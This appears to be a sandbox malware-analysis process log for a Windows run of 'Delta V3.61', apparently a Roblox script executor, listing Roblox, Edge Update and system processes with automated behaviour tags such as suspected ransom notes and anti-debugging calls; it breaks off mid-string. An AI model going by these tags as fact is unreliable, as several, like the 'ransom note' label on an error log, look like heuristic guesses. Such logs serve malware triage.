C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4028 -ip 4028
1⤵
PID:4424

C:\Users\Admin\Downloads\Delta V3.61\Delta V3.61\Delta.exe
"C:\Users\Admin\Downloads\Delta V3.61\Delta V3.61\Delta.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:5900
- C:\Windows\SysWOW64\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\delta_core\error_logs\ERROR_LOG_51663684.5572.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:2232
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5900 -s 1836
  2⤵
  - Program crash
  PID:416

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks system information in the registry
- Modifies data under HKEY_USERS
PID:4464
- C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
  "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzEuMzkiIHNoZWxsX3ZlcnNpb249IjEuMy4xNzEuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7NzQ0OTE0MTYtQzM0OC00OEEzLThFQTItNjZCMDdBMDdBRThFfSIgdXNlcmlkPSJ7NkIzQjRBRjMtOTQ0OC00RDkzLUI1NzctMTRGNUFCM0U4NjcwfSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9Ins0QjE3ODRBRC1EN0EwLTQ2MzEtQjE3Ny03QUQyNTlGQjQ0RTV9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iJnF1b3Q7cjQ1MnQxK2syVGdxL0hYemp2Rk5CUmhvcEJXUjlzYmpYeHFlVURIOXVYMD0mcXVvdDsiLz48YXBwIGFwcGlkPSJ7OEE2OUQzNDUtRDU2NC00NjNjLUFGRjEtQTY5RDlFNTMwRjk2fSIgdmVyc2lvbj0iMTIzLjAuNjMxMi4xMjMiIG5leHR2ZXJzaW9uPSIxMjMuMC42MzEyLjEyMyIgbGFuZz0iZW4iIGJyYW5kPSJHR0xTIiBjbGllbnQ9IiI-PGV2ZW50IGV2ZW50dHlwZT0iMzEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjUiIHN5c3RlbV91cHRpbWVfdGlja3M9IjE0NzY5ODU2MDQ5Ii8-PC9hcHA-PC9yZXF1ZXN0Pg
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Checks system information in the registry
  - System Location Discovery: System Language Discovery
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:1532
- C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{286A6EFD-6AA7-46F0-8A89-4D17594A61CB}\MicrosoftEdge_X64_131.0.2903.146.exe
  "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{286A6EFD-6AA7-46F0-8A89-4D17594A61CB}\MicrosoftEdge_X64_131.0.2903.146.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level
  2⤵
  - Executes dropped EXE
  PID:3812
- - C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{286A6EFD-6AA7-46F0-8A89-4D17594A61CB}\EDGEMITMP_E0208.tmp\setup.exe
    "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{286A6EFD-6AA7-46F0-8A89-4D17594A61CB}\EDGEMITMP_E0208.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{286A6EFD-6AA7-46F0-8A89-4D17594A61CB}\MicrosoftEdge_X64_131.0.2903.146.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Program Files directory
    PID:1372
  - - C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{286A6EFD-6AA7-46F0-8A89-4D17594A61CB}\EDGEMITMP_E0208.tmp\setup.exe
      "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{286A6EFD-6AA7-46F0-8A89-4D17594A61CB}\EDGEMITMP_E0208.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=131.0.6778.265 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{286A6EFD-6AA7-46F0-8A89-4D17594A61CB}\EDGEMITMP_E0208.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=131.0.2903.146 --initial-client-data=0x25c,0x260,0x264,0x238,0x268,0x7ff735d32918,0x7ff735d32924,0x7ff735d32930
      4⤵
      Executes dropped EXE
      PID:3492
- C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
  "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzEuMzkiIHNoZWxsX3ZlcnNpb249IjEuMy4xNzEuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7NzQ0OTE0MTYtQzM0OC00OEEzLThFQTItNjZCMDdBMDdBRThFfSIgdXNlcmlkPSJ7NkIzQjRBRjMtOTQ0OC00RDkzLUI1NzctMTRGNUFCM0U4NjcwfSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9IntGODg1NDc0MS1ENkQzLTQ1N0EtODhCQi04NzVFODhBNTdFMUN9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iJnF1b3Q7VlBRb1AxRitmcTE1d1J6aDFrUEw0UE1wV2g4T1JNQjVpenZyT0MvY2hqUT0mcXVvdDsiLz48YXBwIGFwcGlkPSJ7RjMwMTcyMjYtRkUyQS00Mjk1LThCREYtMDBDM0E5QTdFNEM1fSIgdmVyc2lvbj0iIiBuZXh0dmVyc2lvbj0iMTMxLjAuMjkwMy4xNDYiIGxhbmc9IiIgYnJhbmQ9IiIgY2xpZW50PSIiIGV4cGVyaW1lbnRzPSJjb25zZW50PWZhbHNlIiBpbnN0YWxsYWdlPSItMSIgaW5zdGFsbGRhdGU9Ii0xIj48dXBkYXRlY2hlY2svPjxldmVudCBldmVudHR5cGU9IjkiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjE0Nzc2NDk2MTQ1IiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iNSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTQ3NzY1ODYxNjIiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxNTA0NTY3NTk5MCIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIgZG93bmxvYWRlcj0iYml0cyIgdXJsPSJodHRwOi8vbXNlZGdlLmYudGx1LmRsLmRlbGl2ZXJ5Lm1wLm1pY3Jvc29mdC5jb20vZmlsZXN0cmVhbWluZ3NlcnZpY2UvZmlsZXMvOGY4ZWY2NzYtYWNiMy00ZjE1LWE4NTQtMTYzNDRjYTAzZTkwP1AxPTE3Mzc1NTU4MDYmYW1wO1AyPTQwNCZhbXA7UDM9MiZhbXA7UDQ9UkhmRkQ0a2l6cUIzeTM0c29yZXVLZ1NFMUpqcXJJZWpIbldJdk5OS2tyQk4lMmJMNyUyZnZJbE1JUVZFOXpmJTJmSkcyNmklMmZjbkx4dkd6UnRaYXlza2ZFeUo4dyUzZCUzZCIgc2VydmVyX2lwX2hpbnQ9IiIgY2RuX2NpZD0iLTEiIGNkbl9jY2M9IiIgY2RuX21zZWRnZV9yZWY9IiIgY2RuX2F6dXJlX3JlZl9vcmlnaW5fc2hpZWxkPSIiIGNkbl9jYWNoZT0iIiBjZG5fcDNwPSIiIGRvd25sb2FkZWQ9IjE3Njc1NDI1NiIgdG90YWw9IjE3Njc1NDI1NiIgZG93bmxvYWRfdGltZV9tcz0iMjA2OTEiLz48ZXZlbnQgZXZlbnR0eXBlPSIxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxNTA0NTc3NjI4MSIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjYiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjE1MDYxNjg1OTk1IiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMTk2NzU3IiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxNTY3NzUwNjAwNyIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIgdXBkYXRlX2NoZWNrX3RpbWVfbXM9IjMxNiIgZG93bmxvYWRfdGltZV9tcz0iMjY4OTciIGRvd25sb2FkZWQ9IjE3Njc1NDI1NiIgdG90YWw9IjE3Njc1NDI1NiIgcGFja2FnZV9jYWNoZV9yZXN1bHQ9IjAiIGluc3RhbGxfdGltZV9tcz0iNjE1NzciLz48L2FwcD48L3JlcXVlc3Q-
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Checks system information in the registry
  - System Location Discovery: System Language Discovery
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:220

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
1⤵
- Checks SCSI registry key(s)
PID:4464

C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\RobloxPlayerBeta.exe
"C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\RobloxPlayerBeta.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of UnmapMainImage
PID:3520

C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\RobloxPlayerBeta.exe
"C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\RobloxPlayerBeta.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of UnmapMainImage
PID:2604

C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\RobloxPlayerBeta.exe
"C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\RobloxPlayerBeta.exe"
1⤵
- Executes dropped EXE
PID:1212

C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\RobloxPlayerBeta.exe
"C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\RobloxPlayerBeta.exe"
1⤵
- Executes dropped EXE
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of UnmapMainImage
PID:2508

C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\RobloxPlayerBeta.exe
"C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\RobloxPlayerBeta.exe"
1⤵
- Executes dropped EXE
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of UnmapMainImage
PID:1548

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4a8 0x3cc
1⤵
PID:5376

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
1⤵
PID:4320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 5900 -ip 5900
1⤵
PID:4408

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:440

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3504

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ua /installsource scheduler
1⤵
- Checks system information in the registry
PID:1104

C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Pictures\NewConfirm.jpeg" /ForceBootstrapPaint3D
1⤵
- Suspicious use of SetWindowsHookEx
PID:4912

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s DsSvc
1⤵
- Drops file in System32 directory
PID:5004

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3680

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
1⤵
PID:4024
- C:\Windows\system32\dashost.exe
  dashost.exe {b9a47768-57a0-4302-bfb9f991e4b14866}
  2⤵
  PID:4108

C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe
"C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe"
1⤵
- Checks whether UAC is enabled
- Enumerates system info in registry
- Modifies Internet Explorer settings
PID:776
- C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\RobloxPlayerBeta.exe
  "C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\RobloxPlayerBeta.exe" -app -clientLaunchTimeEpochMs 0 -isInstallerLaunch 776
  2⤵
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of UnmapMainImage
  PID:3192

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Delta V3.61\Delta V3.61\scripts\Put your own scripts in here.txt
1⤵
PID:5104

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
1⤵
- Checks system information in the registry
- Modifies data under HKEY_USERS
PID:880
- C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E41C90AB-6D6D-449E-960F-BB17B058CCDC}\MicrosoftEdgeUpdateSetup_X86_1.3.195.43.exe
  "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E41C90AB-6D6D-449E-960F-BB17B058CCDC}\MicrosoftEdgeUpdateSetup_X86_1.3.195.43.exe" /update /sessionid "{C9821335-6544-4B18-93C6-8C0839F0AEB0}"
  2⤵
  - Drops file in Program Files directory
  PID:4152
- - C:\Program Files (x86)\Microsoft\Temp\EUCA7E.tmp\MicrosoftEdgeUpdate.exe
    "C:\Program Files (x86)\Microsoft\Temp\EUCA7E.tmp\MicrosoftEdgeUpdate.exe" /update /sessionid "{C9821335-6544-4B18-93C6-8C0839F0AEB0}"
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    - Checks system information in the registry
    - System Location Discovery: System Language Discovery
    PID:4112
  - - C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
      "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regsvc
      4⤵
      Modifies registry class
      PID:5188
  - - C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
      "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regserver
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:5544
    - - C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.43\MicrosoftEdgeUpdateComRegisterShell64.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.43\MicrosoftEdgeUpdateComRegisterShell64.exe"
        5⤵
        Modifies registry class
        
        PID:5908
    - - C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.43\MicrosoftEdgeUpdateComRegisterShell64.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.43\MicrosoftEdgeUpdateComRegisterShell64.exe"
        5⤵
        Modifies registry class
        
        PID:856
    - - C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.43\MicrosoftEdgeUpdateComRegisterShell64.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.43\MicrosoftEdgeUpdateComRegisterShell64.exe"
        5⤵
        Modifies registry class
        
        PID:4848
  - - C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
      "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xNzEuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7Qzk4MjEzMzUtNjU0NC00QjE4LTkzQzYtOEMwODM5RjBBRUIwfSIgdXNlcmlkPSJ7NkIzQjRBRjMtOTQ0OC00RDkzLUI1NzctMTRGNUFCM0U4NjcwfSIgaW5zdGFsbHNvdXJjZT0ic2VsZnVwZGF0ZSIgcmVxdWVzdGlkPSJ7MTc3NTI3NzktRDkyMS00MTA0LTg3RDQtNUY0NkYwRjY3MzBDfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjgiIHBoeXNtZW1vcnk9IjgiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IiIgcHJvZHVjdF9uYW1lPSIiLz48ZXhwIGV0YWc9IiZxdW90O3I0NTJ0MStrMlRncS9IWHpqdkZOQlJob3BCV1I5c2JqWHhxZVVESDl1WDA9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0ie0YzQzRGRTAwLUVGRDUtNDAzQi05NTY5LTM5OEEyMEYxQkE0QX0iIHZlcnNpb249IjEuMy4xNzEuMzkiIG5leHR2ZXJzaW9uPSIxLjMuMTk1LjQzIiBsYW5nPSIiIGJyYW5kPSJJTkJYIiBjbGllbnQ9IiIgaW5zdGFsbGFnZT0iMCIgaW5zdGFsbGRhdGV0aW1lPSIxNzM2OTUxMDA0Ij48ZXZlbnQgZXZlbnR0eXBlPSIzIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxODY2NjM0NjA4NiIvPjwvYXBwPjwvcmVxdWVzdD4
      4⤵
      Checks system information in the registry
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Internet Connection Discovery
      PID:3792
- C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
  "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzEuMzkiIHNoZWxsX3ZlcnNpb249IjEuMy4xNzEuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7Qzk4MjEzMzUtNjU0NC00QjE4LTkzQzYtOEMwODM5RjBBRUIwfSIgdXNlcmlkPSJ7NkIzQjRBRjMtOTQ0OC00RDkzLUI1NzctMTRGNUFCM0U4NjcwfSIgaW5zdGFsbHNvdXJjZT0ic2NoZWR1bGVyIiByZXF1ZXN0aWQ9IntGRjM5QjgyMy0zMUIyLTQ4MjctODcyQy1EMDMwNjdCMEVDNkF9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iJnF1b3Q7cjQ1MnQxK2syVGdxL0hYemp2Rk5CUmhvcEJXUjlzYmpYeHFlVURIOXVYMD0mcXVvdDsiLz48YXBwIGFwcGlkPSJ7RjNDNEZFMDAtRUZENS00MDNCLTk1NjktMzk4QTIwRjFCQTRBfSIgdmVyc2lvbj0iMS4zLjE3MS4zOSIgbmV4dHZlcnNpb249IjEuMy4xOTUuNDMiIGxhbmc9IiIgYnJhbmQ9IklOQlgiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSIwIj48dXBkYXRlY2hlY2svPjxldmVudCBldmVudHR5cGU9IjEyIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxODMzOTM4MTU4OCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjEzIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxODMzOTUzNzkwNyIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjE0IiBldmVudHJlc3VsdD0iMCIgZXJyb3Jjb2RlPSItMjE0NzAyMzgzOCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTg2NTA0MDg0NDMiIHNvdXJjZV91cmxfaW5kZXg9IjAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiIGRvd25sb2FkZXI9ImRvIiB1cmw9Imh0dHA6Ly9tc2VkZ2UuYi50bHUuZGwuZGVsaXZlcnkubXAubWljcm9zb2Z0LmNvbS9maWxlc3RyZWFtaW5nc2VydmljZS9maWxlcy8yMDdlODAzNS05OWJlLTQ1ZDItYjJhYS0xODVmNjcwOWM0MDM_UDE9MTczNzU1NjE2MiZhbXA7UDI9NDA0JmFtcDtQMz0yJmFtcDtQND1qa2NuRHZaVndOQTNpc0JxJTJibWIlMmZaRUFDRyUyYkNuY0RmelVyOEp4VHBhSWdmVzRjUWRNRWpsS0R5RWp4OVFJSFdtb2Q2ZEt5MGlNamhWa3FBVThLMXRIQSUzZCUzZCIgc2VydmVyX2lwX2hpbnQ9IiIgY2RuX2NpZD0iLTEiIGNkbl9jY2M9IiIgY2RuX21zZWRnZV9yZWY9IiIgY2RuX2F6dXJlX3JlZl9vcmlnaW5fc2hpZWxkPSIiIGNkbl9jYWNoZT0iIiBjZG5fcDNwPSIiIGRvd25sb2FkZWQ9IjAiIHRvdGFsPSIwIiBkb3dubG9hZF90aW1lX21zPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMTQiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjE4NjUwNDA4NDQzIiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIiBkb3dubG9hZGVyPSJiaXRzIiB1cmw9Imh0dHA6Ly9tc2VkZ2UuYi50bHUuZGwuZGVsaXZlcnkubXAubWljcm9zb2Z0LmNvbS9maWxlc3RyZWFtaW5nc2VydmljZS9maWxlcy8yMDdlODAzNS05OWJlLTQ1ZDItYjJhYS0xODVmNjcwOWM0MDM_UDE9MTczNzU1NjE2MiZhbXA7UDI9NDA0JmFtcDtQMz0yJmFtcDtQND1qa2NuRHZaVndOQTNpc0JxJTJibWIlMmZaRUFDRyUyYkNuY0RmelVyOEp4VHBhSWdmVzRjUWRNRWpsS0R5RWp4OVFJSFdtb2Q2ZEt5MGlNamhWa3FBVThLMXRIQSUzZCUzZCIgc2VydmVyX2lwX2hpbnQ9IiIgY2RuX2NpZD0iLTEiIGNkbl9jY2M9IiIgY2RuX21zZWRnZV9yZWY9IiIgY2RuX2F6dXJlX3JlZl9vcmlnaW5fc2hpZWxkPSIiIGNkbl9jYWNoZT0iIiBjZG5fcDNwPSIiIGRvd25sb2FkZWQ9IjE2NTQzNDQiIHRvdGFsPSIxNjU0MzQ0IiBkb3dubG9hZF90aW1lX21zPSIyNjU3MSIvPjxldmVudCBldmVudHR5cGU9IjE0IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxODY1MDQwODQ0MyIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjE1IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxODY1NTU2NDk3NyIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxwaW5nIHI9Ii0xIiByZD0iLTEiLz48L2FwcD48YXBwIGFwcGlkPSJ7NTZFQjE4RjgtQjAwOC00Q0JELUI2RDItOEM5N0ZFN0U5MDYyfSIgdmVyc2lvbj0iOTIuMC